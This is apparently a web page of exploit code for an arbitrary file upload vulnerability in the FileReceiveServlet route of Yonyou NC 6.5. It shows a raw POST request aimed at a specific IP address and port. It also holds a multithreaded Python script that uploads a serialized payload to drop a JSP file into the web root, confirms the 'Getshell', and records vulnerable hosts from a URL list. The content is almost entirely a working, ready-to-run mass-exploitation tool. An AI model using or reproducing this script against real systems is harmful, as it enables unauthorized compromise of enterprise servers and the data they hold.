跳到主要内容

用友NC6.5版本FileReceiveServlet路由任意文件上传漏洞

POST /servlet/FileReceiveServlet HTTP/1.1
Host: 113.111.49.84:9081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Length: 379


import requests
import threadpool
import urllib3
import sys
import argparse
urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://google.com",
}
def multithreading(funcname, filename="url.txt", pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def wirte_targets(vurl, filename):
with open(filename, "a+") as f:
f.write(vurl + "\n")
return vurl
def exp(u):
uploadHeader = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "multipart/form-data;",
"Referer": "https://google.com"
}
uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
shellFlag = "t0test0ls"
uploadData += shellFlag
try:
req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData,
timeout=25)
if req1.status_code == 200:
req3 = requests.get(u + "/t00ls.jsp", headers=header, verify=False, timeout=25)
if req3.text.index(shellFlag) >= 0:
printFlag = "[Getshell]" + u + "/t00ls.jsp" + "\n"
print(printFlag)
wirte_targets(printFlag, "vuln.txt")
except:
pass
# print(printFlag, end="")
if __name__ == "__main__":
if (len(sys.argv)) < 2:
print('useage : python' + str(sys.argv[0]) + ' -h')
else:
parser = argparse.ArgumentParser()
parser.description = 'YONYOU UC 6.5 FILE UPLOAD!'
parser.add_argument('-u', help="url -> example [url]http://127.0.0.1[/url]", type=str, dest='check_url')
parser.add_argument('-r', help="url list to file", type=str, dest='check_file')
args = parser.parse_args()
if args.check_url:
exp(args.check_url)
if (args.check_file):
multithreading(exp, args.check_file, 8)